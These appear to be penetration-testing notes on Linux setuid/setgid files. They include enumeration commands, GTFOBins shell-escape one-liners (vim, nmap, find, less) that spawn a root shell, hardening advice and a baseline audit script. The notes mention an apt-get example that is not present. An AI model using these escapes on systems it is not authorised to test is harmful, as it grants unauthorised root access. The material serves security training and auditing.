7. Special permissions
Setuid/Setgid Enumeration
# Find setuid files owned by root
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Find setgid files owned by root (-perm -2000 tests the setgid bit; -perm -6000 would only match files with both setuid and setgid set)
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
# Find all setuid files (regardless of owner)
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Find all setgid files (regardless of owner)
find / -perm -2000 -exec ls -ldb {} \; 2>/dev/null
GTFOBins Check (manual: check each binary against GTFOBins)
Example: if /usr/bin/vim has the setuid bit, check GTFOBins for "vim".
# Example of GTFOBins usage (if vim is setuid and in GTFOBins):
vim -c ':!/bin/sh'
# Example of GTFOBins usage (if nmap is setuid and in GTFOBins; --interactive exists only in old nmap releases):
nmap --interactive
!sh
# Example of GTFOBins usage (if find is setuid and in GTFOBins):
find / -exec /bin/sh -p \; -quit
# Example of GTFOBins usage (if less is setuid and in GTFOBins):
less /etc/passwd
!/bin/sh
Understanding setuid and setgid
setuid (Set User ID):
When a file has the setuid bit set, it executes with the effective user ID of the file's owner, not of the user who runs it. If the owner is root, the program runs with root privileges.
Represented by an "s" in the owner's execute position (e.g., -rwsr-xr-x).
Command to find setuid files owned by root:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
setgid (Set Group ID):
Similar to setuid, but it sets the effective group ID to the file's group owner. Useful for giving users temporary access to group-owned resources.
Represented by an "s" in the group's execute position (e.g., -rwxr-sr-x).
Command to find setgid files owned by root (-perm -2000 tests the setgid bit alone):
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
Privilege Escalation Potential
If a setuid binary owned by root has a vulnerability, a regular user can exploit it to gain root privileges. Common vulnerabilities include:
Buffer overflows.
Format string vulnerabilities.
Unsafe use of system calls.
Path abuse.
setgid binaries can be abused in the same way to gain the group's privileges.
GTFOBins: A Crucial Resource
GTFOBins (gtfobins.github.io) is a curated list of Unix binaries that can be used to bypass security restrictions in misconfigured systems.
It provides examples of how to:
Escape restricted shells.
Escalate privileges.
Spawn shells.
Transfer files.
The example given, using apt-get, is a very strong example of how GTFOBins can be used.
The key to using GTFOBins is to enumerate the binaries present on a target system and then check whether those binaries have entries in GTFOBins.
Important Considerations
Security Risk: setuid and setgid can be significant security risks if not configured carefully.
Minimal Privileges: Always follow the principle of least privilege. Only grant the necessary permissions.
Regular Audits: Regularly audit setuid and setgid files to identify and mitigate potential risks.
Code Review: If custom setuid or setgid programs are developed, conduct thorough code reviews to ensure they are secure.
When finding a setuid or setgid binary, always check whether it is listed in GTFOBins.
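The "Regular Audits" point above is easier to act on if the find output is compared against a known-good baseline, so that a newly appeared setuid file stands out instead of being buried among the dozens of legitimate ones. The following audit script is an added example, not code from the original notes; the baseline format (one absolute path per line) and all function names are assumptions, and it mirrors the find commands above (symlinks not followed, unreadable paths skipped).

```python
"""Audit setuid/setgid files against a known-good baseline.

Added example, not part of the original notes. The baseline format
(one absolute path per line) and all function names are assumptions."""
import os
import stat


def special_bits(mode):
    """Return the special bits set in a stat mode as a set: 'suid', 'sgid'."""
    bits = set()
    if mode & stat.S_ISUID:
        bits.add("suid")
    if mode & stat.S_ISGID:
        bits.add("sgid")
    return bits


def find_special(root, uid=None):
    """Walk root and return {path: (owner_uid, bits)} for regular files with
    setuid or setgid set, optionally restricted to one owner uid (0 = root).
    Symlinks are not followed and unreadable entries are skipped, mirroring
    `find / -user root -perm -4000 ... 2>/dev/null`."""
    found = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # permission denied or file vanished mid-walk
                continue
            if not stat.S_ISREG(st.st_mode):  # skips symlinks, sockets, etc.
                continue
            bits = special_bits(st.st_mode)
            if bits and (uid is None or st.st_uid == uid):
                found[path] = (st.st_uid, frozenset(bits))
    return found


def load_baseline(text):
    """Parse a baseline: one absolute path per line; blanks and '#' comments ignored."""
    return {ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")}


def diff_baseline(found, baseline):
    """Return (unexpected, missing): privileged files not in the baseline (review
    each one, e.g. against GTFOBins), and baseline entries no longer privileged."""
    current = set(found)
    return sorted(current - baseline), sorted(baseline - current)
```

Run find_special("/", uid=0) once on a freshly built host and save the sorted keys as the baseline; later runs feed diff_baseline, and anything in the "unexpected" list is what deserves a GTFOBins lookup and an owner review.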
In essence, setuid and setgid are powerful tools that must be used with caution. GTFOBins is an essential resource for penetration testers and security professionals to identify and exploit misconfigurations related to these permissions.